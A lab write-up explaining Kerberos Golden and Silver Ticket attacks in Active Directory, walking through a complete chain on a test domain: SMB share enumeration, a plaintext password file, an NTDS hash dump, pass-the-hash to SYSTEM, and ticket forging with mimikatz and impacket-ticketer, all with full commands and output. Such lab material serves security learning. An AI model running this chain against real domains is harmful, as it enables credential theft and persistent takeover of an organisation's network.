In this write-up we talk about two core attack in Active Directory. Golden Ticket Attack and Silver Ticket attack. These techniques allow an attacker to forge Kerberos tickets and impersonate legitimate users, often without needing their passwords. The Golden ticket attack enable full domain compromise while a Silver ticket attack target specific services. So lets dive deeper and see what this attacks does.
The Golden Ticket
So we talked earlier Golden Ticket enable use the compromise the whole domain. Its a persistence technique used on post compromise stage.
In Active Directory environments, Kerberos authentication relies on a trusted system of exchanging tickets. A Golden ticket attack exploits this trusted model by allowing an attacker to forge a valid TGT using the secret key of KRBTGT account. With the forged ticket the attacker can impersonate as any user they want.
[ Attacker Machine ]
|
(1) Dump KRBTGT Hash (DA access)
|
v
+----------------------+
| Domain Controller |
| (KDC / KRBTGT key) |
+----------------------+
|
(2) Forge TGT offline using KRBTGT hash
|
v
[ Forged TGT ]
(User: Administrator, RID: 500,
Groups: Domain Admins, etc.)
|
(3) Inject ticket into memory (PTT)
|
v
[ Compromised Host ]
|
(4) Request Service Ticket (TGS)
|
v
+----------------------+
| Domain Controller |
| (validates TGT) |
+----------------------+
|
(5) KDC trusts forged TGT → issues TGS
|
v
[ Target Service ]
(SMB / MSSQL / LDAP / etc.)
|
(6) Access granted as Domain AdminDuring a normal authentication, a client requests a TGT from the KDC's Authentication Service. This TGT is encrypted and signed with the KRBTGT account's NTLM hash. The client then presents this TGT to the Ticket Granting Service (TGS) to obtain service tickets for accessing resources.
The Golden ticket attack abuses this design by forging a valid TGT using the compromised KRBTGT hash. Since the KDC uses the same hash to validate incoming TGTs, any ticket signed with the key is inherently trusted. This keep the authentication out of the stage.
No we get to a lab of the attack. i made a small scenario of the attack from the initial access to owning the whole domain.
First start with netexec to enumerate the shares. We can try guest authentication first.
◎ nxc smb 172.0.10.13 -u 'guest' -p '' --shares
SMB 172.0.10.13 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:breakme.local) (signing:False) (SMBv1:False)
SMB 172.0.10.13 445 DC01 [+] breakme.local\guest:
SMB 172.0.10.13 445 DC01 [*] Enumerated shares
SMB 172.0.10.13 445 DC01 Share Permissions Remark
SMB 172.0.10.13 445 DC01 ----- ----------- ------
SMB 172.0.10.13 445 DC01 ADMIN$ Remote Admin
SMB 172.0.10.13 445 DC01 Backup Backup Share
SMB 172.0.10.13 445 DC01 C$ Default share
SMB 172.0.10.13 445 DC01 Finance_Reports Finance Reports
SMB 172.0.10.13 445 DC01 HR_Files HR Files
SMB 172.0.10.13 445 DC01 IPC$ READ Remote IPC
SMB 172.0.10.13 445 DC01 IT_Documents IT Department Documents
SMB 172.0.10.13 445 DC01 NETLOGON Logon server share
SMB 172.0.10.13 445 DC01 Public READ,WRITE Public Share
SMB 172.0.10.13 445 DC01 Shared READ,WRITE Shared Documents - Open Access
SMB 172.0.10.13 445 DC01 SYSVOL Logon server shareSo we have read access to some share. We can enumerate some shares. Lets go with the Shared Share.
◎ smbclient //172.0.10.13/Shared -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Mar 18 23:05:22 2026
.. D 0 Mon Jan 5 13:17:27 2026
backup_config.txt A 161 Mon Jan 5 13:17:28 2026
credentials.txt A 244 Mon Jan 5 13:17:28 2026
notes.txt A 112 Mon Jan 5 13:17:28 2026
readme.txt A 181 Mon Jan 5 13:17:28 2026
12908287 blocks of size 4096. 8123928 blocks available
smb: \> get credentials.txt
getting file \credentials.txt of size 244 as credentials.txt (79.4 KiloBytes/sec) (average 79.4 KiloBytes/sec)
smb: \> exitSo we found a credentials.txt file and lets check that.
◎ cat credentials.txt
Backup Service Account Credentials
Username: backup_admin
Password: robert
Domain: breakme.local
Note: This account has backup operator privileges.
Use for scheduled backup tasks.
WARNING: This file should be moved to a secure location!So we got the initial access vector of a backup admin password. Now lets try to authenticate.
◎ nxc smb 172.0.10.13 -u backup_admin -p robert
SMB 172.0.10.13 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:breakme.local) (signing:False) (SMBv1:False)
SMB 172.0.10.13 445 DC01 [+] breakme.local\backup_admin:robert (Pwn3d!)So we see we are authenticated and we also we (Pwn3d!). So we are a Local Admin in this machine. Lets not dump the ntds.dit database and get all the hashes.
◎ nxc smb 172.0.10.13 -u backup_admin -p robert --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n]
SMB 172.0.10.13 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:breakme.local) (signing:False) (SMBv1:False)
SMB 172.0.10.13 445 DC01 [+] breakme.local\backup_admin:robert (Pwn3d!)
SMB 172.0.10.13 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.0.10.13 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:a94e5c55d3b65705496781e68001cca1:::
SMB 172.0.10.13 445 DC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.0.10.13 445 DC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:269cac996a1a21aaac5c04f99aa47fd9:::
SMB 172.0.10.13 445 DC01 breakme.local\jsmith:1114:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB 172.0.10.13 445 DC01 breakme.local\sjohnson:1115:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB 172.0.10.13 445 DC01 breakme.local\mwilliams:1116:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
SMB 172.0.10.13 445 DC01 breakme.local\ebrown:1117:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
SMB 172.0.10.13 445 DC01 breakme.local\djones:1118:aad3b435b51404eeaad3b435b51404ee:9a0198b452271b12ed7bfa3857896de6:::
SMB 172.0.10.13 445 DC01 breakme.local\jgarcia:1119:aad3b435b51404eeaad3b435b51404ee:4ddec0a4c1b022c5fd8503826fbfb7f2:::
SMB 172.0.10.13 445 DC01 breakme.local\rmiller:1120:aad3b435b51404eeaad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
SMB 172.0.10.13 445 DC01 breakme.local\adavis:1121:aad3b435b51404eeaad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
SMB 172.0.10.13 445 DC01 breakme.local\crodriguez:1122:aad3b435b51404eeaad3b435b51404ee:dcd25a439cd39daa6baeb6c02e88a9e6:::
SMB 172.0.10.13 445 DC01 breakme.local\mmartinez:1123:aad3b435b51404eeaad3b435b51404ee:f773c5db7ddebefa4b0dae7ee8c50aea:::
SMB 172.0.10.13 445 DC01 breakme.local\dhernandez:1124:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::
SMB 172.0.10.13 445 DC01 breakme.local\llopez:1125:aad3b435b51404eeaad3b435b51404ee:320a78179516c385e35a93ffa0b1c4ac:::
SMB 172.0.10.13 445 DC01 breakme.local\jwilson:1126:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
SMB 172.0.10.13 445 DC01 breakme.local\panderson:1127:aad3b435b51404eeaad3b435b51404ee:6d3986e540a63647454a50e26477ef94:::
SMB 172.0.10.13 445 DC01 breakme.local\mthomas:1128:aad3b435b51404eeaad3b435b51404ee:31c72c210ecc03d1eae94fa496069448:::
SMB 172.0.10.13 445 DC01 breakme.local\john:1129:aad3b435b51404eeaad3b435b51404ee:c27975d3a5b9e95acd37ec1b1b7598b8:::
SMB 172.0.10.13 445 DC01 breakme.local\jane:1130:aad3b435b51404eeaad3b435b51404ee:97b592737f87a48fe07e59db8659d166:::
SMB 172.0.10.13 445 DC01 breakme.local\bwilliams:1131:aad3b435b51404eeaad3b435b51404ee:fb4bf3ddf37cf6494a9905541290cf51:::
SMB 172.0.10.13 445 DC01 breakme.local\asmith:1132:aad3b435b51404eeaad3b435b51404ee:bb53a477af18526ada697ce2e51f76b3:::
SMB 172.0.10.13 445 DC01 breakme.local\user:1133:aad3b435b51404eeaad3b435b51404ee:579110c49145015c47ecd267657d3174:::
SMB 172.0.10.13 445 DC01 breakme.local\johnsmith:1134:aad3b435b51404eeaad3b435b51404ee:4057b60b514c5402dde3d29a1845c366:::
SMB 172.0.10.13 445 DC01 breakme.local\sarahjohnson:1135:aad3b435b51404eeaad3b435b51404ee:72f5cfa80f07819ccbcfb72feb9eb9b7:::
SMB 172.0.10.13 445 DC01 breakme.local\michaelbrown:1136:aad3b435b51404eeaad3b435b51404ee:152efbcfafeb22eabda8fc5e68697a41:::
SMB 172.0.10.13 445 DC01 breakme.local\kwhite:1137:aad3b435b51404eeaad3b435b51404ee:dd555241a4321657e8b827a40b67dd4a:::
SMB 172.0.10.13 445 DC01 breakme.local\nharris:1138:aad3b435b51404eeaad3b435b51404ee:b7e0ea9fbffcf6dd83086e905089effd:::
SMB 172.0.10.13 445 DC01 breakme.local\rclark:1139:aad3b435b51404eeaad3b435b51404ee:8d4ef8654a9adc66d4f628e94f66e31b:::
SMB 172.0.10.13 445 DC01 breakme.local\slewis:1140:aad3b435b51404eeaad3b435b51404ee:2bdcad6d2082323222a291328ab4883e:::
SMB 172.0.10.13 445 DC01 breakme.local\lwalker:1141:aad3b435b51404eeaad3b435b51404ee:58def5844fe58e8f26a65fff9deb3827:::
SMB 172.0.10.13 445 DC01 breakme.local\mhall:1142:aad3b435b51404eeaad3b435b51404ee:bf4c3092a586df1a9137a4f5737bdc94:::
SMB 172.0.10.13 445 DC01 breakme.local\jallen:1143:aad3b435b51404eeaad3b435b51404ee:5eee54ce19b97c11fd02e531dd268b4c:::
SMB 172.0.10.13 445 DC01 breakme.local\eyoung:1144:aad3b435b51404eeaad3b435b51404ee:b7265f8cc4f00b58f413076ead262720:::
SMB 172.0.10.13 445 DC01 breakme.local\nking:1145:aad3b435b51404eeaad3b435b51404ee:2d0bc7fe9cd9293cdc87b2162a52a4a0:::
SMB 172.0.10.13 445 DC01 breakme.local\swright:1146:aad3b435b51404eeaad3b435b51404ee:6241f038703cbfb7cc837e3ee04f0f6b:::
SMB 172.0.10.13 445 DC01 breakme.local\tlopez:1147:aad3b435b51404eeaad3b435b51404ee:39b8620e745b8aa4d1108e22f74f29e2:::
SMB 172.0.10.13 445 DC01 breakme.local\khill:1148:aad3b435b51404eeaad3b435b51404ee:c52abb1e14677d7ea228fcc1171ed7b7:::
SMB 172.0.10.13 445 DC01 breakme.local\nscott:1149:aad3b435b51404eeaad3b435b51404ee:ec2c9f3346af1fb8e4ee94f286bac5ad:::
SMB 172.0.10.13 445 DC01 breakme.local\bgreen:1150:aad3b435b51404eeaad3b435b51404ee:85ac333bbfcbaa62ba9f8afb76f06268:::
SMB 172.0.10.13 445 DC01 breakme.local\hadams:1151:aad3b435b51404eeaad3b435b51404ee:c7f9949b02c66ac8f73196675a07bf7c:::
SMB 172.0.10.13 445 DC01 breakme.local\sbaker:1152:aad3b435b51404eeaad3b435b51404ee:d8d34b3cff03786fbe1d80b2c8c09d9e:::
SMB 172.0.10.13 445 DC01 breakme.local\dnelson:1153:aad3b435b51404eeaad3b435b51404ee:0ab71493101c2e080fbcf1961e518513:::
SMB 172.0.10.13 445 DC01 breakme.local\ccarter:1154:aad3b435b51404eeaad3b435b51404ee:75585b269146e4ce4828a89e54bc6b0d:::
SMB 172.0.10.13 445 DC01 breakme.local\rmitchell:1155:aad3b435b51404eeaad3b435b51404ee:5590aeecbc91d32a4566ab8b0799ca04:::
SMB 172.0.10.13 445 DC01 breakme.local\sperez:1156:aad3b435b51404eeaad3b435b51404ee:e58849315e4c3a7a9a4af80ae33c59d1:::
SMB 172.0.10.13 445 DC01 breakme.local\mroberts:1157:aad3b435b51404eeaad3b435b51404ee:95a607aba41d7dc1f32ffdbc5c122191:::
SMB 172.0.10.13 445 DC01 breakme.local\eturner:1158:aad3b435b51404eeaad3b435b51404ee:92b7b06bb313bf666640c5a1e75e0c18:::
SMB 172.0.10.13 445 DC01 breakme.local\kphillips:1159:aad3b435b51404eeaad3b435b51404ee:8d44c8ff3a4d1979b24bfe29257173ad:::
SMB 172.0.10.13 445 DC01 breakme.local\backup_admin:1160:aad3b435b51404eeaad3b435b51404ee:12136c7dd697dd0dfbc33ae2e5795d93:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_backup:1161:aad3b435b51404eeaad3b435b51404ee:674e48b68c5cd0efd8f7e5faa87b3d1e:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_sql:1162:aad3b435b51404eeaad3b435b51404ee:31fc0dc8f7dfad0e8bd7ccc3842f2ce9:::
SMB 172.0.10.13 445 DC01 breakme.local\admin_legacy:1163:aad3b435b51404eeaad3b435b51404ee:5d05e3883afc84f1842f8b1c6d895fa4:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_http:1164:aad3b435b51404eeaad3b435b51404ee:ec1925c6d3d4206891f83b8ff1a9eabc:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_mssql:1165:aad3b435b51404eeaad3b435b51404ee:74ed32086b1317b742c3a92148df1019:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_exchange:1166:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_iis:1167:aad3b435b51404eeaad3b435b51404ee:8d44c8ff3a4d1979b24bfe29257173ad:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_delegation:1168:aad3b435b51404eeaad3b435b51404ee:adfd113f9a55239f0c74ee6dc7798623:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_constrained:1169:aad3b435b51404eeaad3b435b51404ee:dc944d1193bc233287b3b3ba66f08116:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_rbcd:1170:aad3b435b51404eeaad3b435b51404ee:5319b3346226e70bbe08376691807c83:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_replication:1171:aad3b435b51404eeaad3b435b51404ee:2d0bc7fe9cd9293cdc87b2162a52a4a0:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_nopass:1172:aad3b435b51404eeaad3b435b51404ee:eac03cc37b34a79bc884dfeef01bc4a3:::
SMB 172.0.10.13 445 DC01 breakme.local\guest_nopass:1173:aad3b435b51404eeaad3b435b51404ee:eac03cc37b34a79bc884dfeef01bc4a3:::
SMB 172.0.10.13 445 DC01 breakme.local\sanji:1175:aad3b435b51404eeaad3b435b51404ee:68ae965c9062b389f2a285e27ff0a566:::
SMB 172.0.10.13 445 DC01 DC01$:1000:aad3b435b51404eeaad3b435b51404ee:3efdb28e46e699705d0207aa2fec28ad:::
SMB 172.0.10.13 445 DC01 WS01$:1174:aad3b435b51404eeaad3b435b51404ee:4bfb438db8d8543981ab7466cf954f41:::
SMB 172.0.10.13 445 DC01 [+] Dumped 66 NTDS hashes to /home/kali/.nxc/logs/ntds/DC01_172.0.10.13_2026-03-18_231113.ntds of which 64 were added to the database
SMB 172.0.10.13 445 DC01 [*] To extract only enabled accounts from the output file, run the following command:
SMB 172.0.10.13 445 DC01 [*] cat /home/kali/.nxc/logs/ntds/DC01_172.0.10.13_2026-03-18_231113.ntds | grep -iv disabled | cut -d ':' -f1
SMB 172.0.10.13 445 DC01 [*] grep -iv disabled /home/kali/.nxc/logs/ntds/DC01_172.0.10.13_2026-03-18_231113.ntds | cut -d ':' -f1So we got all the hashes. Now basically we owned the domain. But we need persistence.
We got the first thing we want the hash of the krbtgt account.
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:269cac996a1a21aaac5c04f99aa47fd9:::We only want the nthash part. Now lets psexec to the machine with Administrator's hash.
◎ impacket-psexec breakme.local/administrator@172.0.10.13 -hashes :a94e5c55d3b65705496781e68001cca1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 172.0.10.13.....
[*] Found writable share ADMIN$
[*] Uploading file lwrnIUXH.exe
[*] Opening SVCManager on 172.0.10.13.....
[*] Creating service SdHx on 172.0.10.13.....
[*] Starting service SdHx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.26100.1742]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> whoami
nt authority\system
C:\Windows\System32>
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 960B-96BA
Directory of C:\Users\Administrator\Desktop
18-03-2026 05:46 <DIR> .
18-03-2026 03:43 <DIR> ..
27-02-2026 02:36 1,355,264 mimikatz.exe
27-02-2026 02:36 446,976 Rubeus.exe
2 File(s) 2,023,106 bytes
2 Dir(s) 33,284,661,248 bytes free
C:\Users\Administrator\Desktop> Next we can have to find the Domain SID. For that we can use the command.
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADdomain
AllowedDNSSuffixes : {}
ChildDomains : {}
ComputersContainer : CN=Computers,DC=breakme,DC=local
DeletedObjectsContainer : CN=Deleted Objects,DC=breakme,DC=local
DistinguishedName : DC=breakme,DC=local
DNSRoot : breakme.local
DomainControllersContainer : OU=Domain Controllers,DC=breakme,DC=local
DomainMode : Windows2025Domain
DomainSID : S-1-5-21-3878086263-1604080912-3480837854
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=breakme,DC=local
Forest : breakme.local
InfrastructureMaster : DC01.breakme.local
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {cn={B3FC19C0-88B7-4CB7-8DBC-D8C4A3660C63},cn=policies,cn=system,DC=breakme,DC=local, cn={D820C191-D05F-4A32-9FAF-32BE5D7E5DBE},cn=policies,cn=system,DC=breakme,DC=local,
cn={30529373-4640-4DCE-8760-CFB1663563E7},cn=policies,cn=system,DC=breakme,DC=local, CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=breakme,DC=local}
LostAndFoundContainer : CN=LostAndFound,DC=breakme,DC=local
ManagedBy :
Name : breakme
NetBIOSName : BREAKME
ObjectClass : domainDNS
ObjectGUID : f6f768ea-8001-4346-857f-2d1d3ed55331
ParentDomain :
PDCEmulator : DC01.breakme.local
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=breakme,DC=local
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {DC01.breakme.local}
RIDMaster : DC01.breakme.local
SubordinateReferences : {DC=ForestDnsZones,DC=breakme,DC=local, DC=DomainDnsZones,DC=breakme,DC=local, CN=Configuration,DC=breakme,DC=local}
SystemsContainer : CN=System,DC=breakme,DC=local
UsersContainer : CN=Users,DC=breakme,DC=local
*Evil-WinRM* PS C:\Users\Administrator\Documents> I have already uploaded a copy of mimikatz to the Machine. Now we can use mimikatz to start the attack. The command for the Golden ticket attack is the following.
# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt
# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt
# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /pttWe got the NT hash, Let go with that.
C:\Users\Administrator\Desktop> .\mimikatz
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
kerberos::golden /domain:breakme.local /sid:S-1-5-21-3878086263-1604080912-3480837854 /rc4:269cac996a1a21aaac5c04f99aa47fd9 /user:Administrator /ptt
mimikatz # User : Administrator
Domain : breakme.local (BREAKME)
SID : S-1-5-21-3878086263-1604080912-3480837854
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 269cac996a1a21aaac5c04f99aa47fd9 - rc4_hmac_nt
Lifetime : 18-03-2026 08:18:45 ; 15-03-2036 08:18:45 ; 15-03-2036 08:18:45
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ breakme.local' successfully submitted for current sessionWe can see the the ticket is injected to the current session. We can verify that with.
C:\Users\Administrator\Desktop> klist
Current LogonId is 0:0x3e7
Cached Tickets: (1)
#0> Client: Administrator @ breakme.local
Server: krbtgt/breakme.local @ breakme.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/18/2026 8:18:45 (local)
End Time: 3/15/2036 8:18:45 (local)
Renew Time: 3/15/2036 8:18:45 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:We can also we a cool thing. Its the ticket expiry. Its actually 10 years.
For persistence we can save that ticket to a file and then use it later. For that we can use the following commands.
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ticket:golden.kirbi
C:\Users\Administrator\Desktop> .\mimikatz
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
kerberos::golden /domain:breakme.local /sid:S-1-5-21-3878086263-1604080912-3480837854 /rc4:269cac996a1a21aaac5c04f99aa47fd9 /user:Administrator /ticket:golden.kirbi
mimikatz # User : Administrator
Domain : breakme.local (BREAKME)
SID : S-1-5-21-3878086263-1604080912-3480837854
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 269cac996a1a21aaac5c04f99aa47fd9 - rc4_hmac_nt
Lifetime : 18-03-2026 08:22:22 ; 15-03-2036 08:22:22 ; 15-03-2036 08:22:22
-> Ticket : golden.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 960B-96BA
Directory of C:\Users\Administrator\Desktop
18-03-2026 05:46 <DIR> .
18-03-2026 03:43 <DIR> ..
18-03-2026 08:22 1,403 golden.kirbi
27-02-2026 02:36 1,355,264 mimikatz.exe
27-02-2026 02:36 446,976 Rubeus.exe
04-01-2026 22:02 219,463 Setup-VulnerableAD.ps1
4 File(s) 2,023,106 bytes
2 Dir(s) 33,283,723,264 bytes freeNow we can perform this attack form Linux.
We can use the impacket-ticketer script for this. We use the following commands.
# Create the golden ticket (with an RC4 key, i.e. NT hash)
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"
# Create the golden ticket (with an AES 128/256bits key)
ticketer.py -aesKey "$krbtgtAESkey" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"We can lookup the Domain SID with
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
◎ impacket-lookupsid -hashes :a94e5c55d3b65705496781e68001cca1 'breakme.local\Administrator@breakme.local' 0
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at breakme.local
[*] StringBinding ncacn_np:breakme.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3878086263-1604080912-3480837854Now lets do the attack.
◎ impacket-ticketer -nthash "269cac996a1a21aaac5c04f99aa47fd9" -domain-sid "S-1-5-21-3878086263-1604080912-3480837854" -domain "breakme.local" "Administrator"
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breakme.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccacheSo we got ccache file. Now can use kerberos authentication to do future things we want.
┌──(kali㉿kali)-[~/Desktop/breakme.local]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(kali㉿kali)-[~/Desktop/breakme.local]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@BREAKME.LOCAL
Valid starting Expires Service principal
03/18/2026 23:33:57 03/15/2036 23:33:57 krbtgt/BREAKME.LOCAL@BREAKME.LOCAL
renew until 03/15/2036 23:33:57We can see the ticket is valid for the next 10 years.
So this is how Golden ticket attack is done. Now Lets move onto Silver ticket attack.
The Silver Ticket
So the Silver Ticket is a Kerberos Exploitation techniques that involves forging a valid Ticket Granting Service(TGS) Ticket for a specific service rather than a Ticket Granting Ticket (TGT).
In a normal Kerberos Flow, a client presents a valid TGT to KDC to request a service ticket, which ten used to authenticate to a specific such a SMB, MSSQL, HTTP etc. A Silver ticket attack exploits this by allowing an attacker to forge a TGS offline using the service account's hash. With this silver ticket attack we can impersonate any user we want to access that specific server.
[ Attacker Machine ]
|
(1) Dump Service Account Hash
(e.g., CIFS / MSSQL / HTTP)
|
v
+----------------------+
| Target Service Host |
| (knows its password)|
+----------------------+
|
(2) Forge TGS offline using service hash
|
v
[ Forged TGS ]
(User: Administrator,
Service: CIFS/DC,
Groups: Domain Admins)
|
(3) Inject ticket into memory (PTT)
|
v
[ Compromised Host ]
|
(4) Directly access service
(NO KDC communication !)
|
v
+----------------------+
| Target Service |
| (validates locally) |
+----------------------+
|
(5) Access grantedNow lets move onto the Lab. I have set up a MSSQL Service and we can use the Silver to exploit it.
Lets start with doing the attack from Linux.
We use the same impacket-ticketer script. The commands are the following
# with an NT hash
python ticketer.py -nthash "$NT_HASH" -domain-sid "$DomainSID" -domain "$DOMAIN" -spn "$SPN" "username"
# with an AES (128 or 256 bits) key
python ticketer.py -aesKey "$AESkey" -domain-sid "$DomainSID" -domain "$DOMAIN" -spn "$SPN" "username"For looking up the Domain use the same command we used earlier.
So for this we need the nthash of the service account. For we can do attacks like kerberoasting and capture the hash , crack it and we can convert the password back the NT hash. For that we can use this website.
Also we have to specify the spn. we can enumerate that by the following commands.
◎ impacket-GetUserSPNs breakme.local/backup_admin:robert -dc-ip 172.0.10.13
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- ------------ -------- -------------------------- -------------------------- ----------
exchange/mail.breakme.local svc_exchange 2026-01-05 13:17:16.077919 <never>
HTTP/iis01.breakme.local svc_iis 2026-01-05 13:17:16.171247 <never>
HTTP/web01.breakme.local svc_http 2026-01-05 13:17:15.862369 <never>
MSSQLSvc/ws01.breakme.local:1433 svc_mssql 2026-03-18 21:15:32.643395 2026-03-18 22:31:04.581389 Now that we got all we wanted we can start the attack.
◎ impacket-ticketer -nthash 74ED32086B1317B742C3A92148DF1019 -domain-sid S-1-5-21-3878086263-1604080912-3480837854 -domain breakme.local -spn "MSSQLSvc/ws01.breakme.local" Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breakme.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccacheSo we got the ccache file.
Before doing the authentication. We can see the normal authentication and and the silver ticket exploited authentication.
◎ impacket-mssqlclient -windows-auth breakme.local/svc_mssql:mustang@ws01.breakme.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WS01): Line 1: Changed database context to 'master'.
[*] INFO(WS01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (170 3232)
[!] Press help for extra shell commands
SQL (breakme\svc_mssql svc_mssql@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonated
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
upload {from} {to} - uploads file {from} to the SQLServer host {to}
show_query - show query
mask_query - mask query
SQL (breakme\svc_mssql svc_mssql@master)> enable_xp_cmdshell
ERROR(WS01): Line 105: User does not have permission to perform this action.
ERROR(WS01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(WS01): Line 105: User does not have permission to perform this action.
ERROR(WS01): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (breakme\svc_mssql svc_mssql@master)>With just the service account we can see the xp_cmdshell is which lets us execute shell commands.
